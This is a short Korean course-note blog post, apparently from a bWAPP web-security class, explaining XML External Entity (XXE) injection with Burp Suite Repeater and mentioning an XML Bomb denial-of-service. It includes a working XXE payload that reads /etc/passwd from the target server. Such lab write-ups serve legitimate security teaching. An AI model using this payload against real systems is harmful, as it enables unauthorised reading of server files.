1. XXE
- XML 인젝션을 실시하여 XML Parser(마크업 분석/구조화된 정보를 어플리케이션에게 전달하는 프로세서)를 통하여 페이지의 내용을 대체하는 권한을 획득하는 취약점이다.
2. XML External Entity Attacks
- 인터셉트 내용 리피터로 이동
- 버프 슈트 r/c -> Send to Repeater -> 상단 메뉴 Repeater 클릭
- XML 인젝션 코드 제작
- 기존의 바디 내용을 다음 XXE 코드로 변경한다.
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY XXE SYSTEM "file:///etc/passwd">
]>
<reset>
<login>&XXE;</login>
<secret>test</secret>
</reset>
3. Denial-of-Service (XML Bomb)
- 버프 슈트에 인터셉트된 'XML Bomb' 코드를 확인한다.
'메가IT아카데미 국기과정 > JAVA와 웹보안' 카테고리의 다른 글
| [1-12] BWAPP 환경 IDS(Snort) 구성 (1) | 2022.09.13 |
|---|---|
| [1-11] Unvalidated Redirects & Forwards (0) | 2022.09.13 |
| [1-9] Remote & Local File Inclusion (0) | 2022.09.13 |
| [1-8] Cross-Site Request Forgery (0) | 2022.09.13 |
| [1-7] Sensitive Data Exposure (0) | 2022.09.13 |
